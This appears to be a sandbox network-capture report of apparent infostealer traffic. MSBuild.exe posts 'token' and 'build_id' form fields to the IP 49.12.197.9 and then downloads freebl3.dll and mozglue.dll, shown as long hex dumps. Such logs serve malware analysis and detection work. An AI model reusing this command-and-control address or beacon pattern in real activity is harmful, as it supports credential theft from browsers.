                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:49 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFH
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 437
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:49 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------BFCGDAAKFHIDBFIDBKFHCont
                                                                                                                                                                                                                    2024-10-03 13:14:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:50 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:14:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    11192.168.2.85624549.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:50 UTC195OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:51 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 685392
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Last-Modified: Thursday, 03-Oct-2024 13:14:51 GMT
                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
                                                                                                                                                                                                                    Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
                                                                                                                                                                                                                    Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                                                                                                                                                    Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                                                                                                                                                    Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                                                                                                                                                    Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                                                                                                                                                    Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                                                                                                                                                    Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                                                                                                                                                    Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                                                                                    2024-10-03 13:14:51 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                                                                                                                                                    Data Ascii: ,0<48%8A)$


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    12192.168.2.85624749.12.197.94433832C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-10-03 13:14:52 UTC195OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:14:52 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 608080
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Last-Modified: Thursday, 03-Oct-2024 13:14:52 GMT
                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                                                                                                                                                    Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                                                                                                                                                    Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                                                                                                                                                    Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                                                                                                                                                    Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                                                                                                                                                    Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                                                                                                                    2024-10-03 13:14:53 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                                                                                                                                                    Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
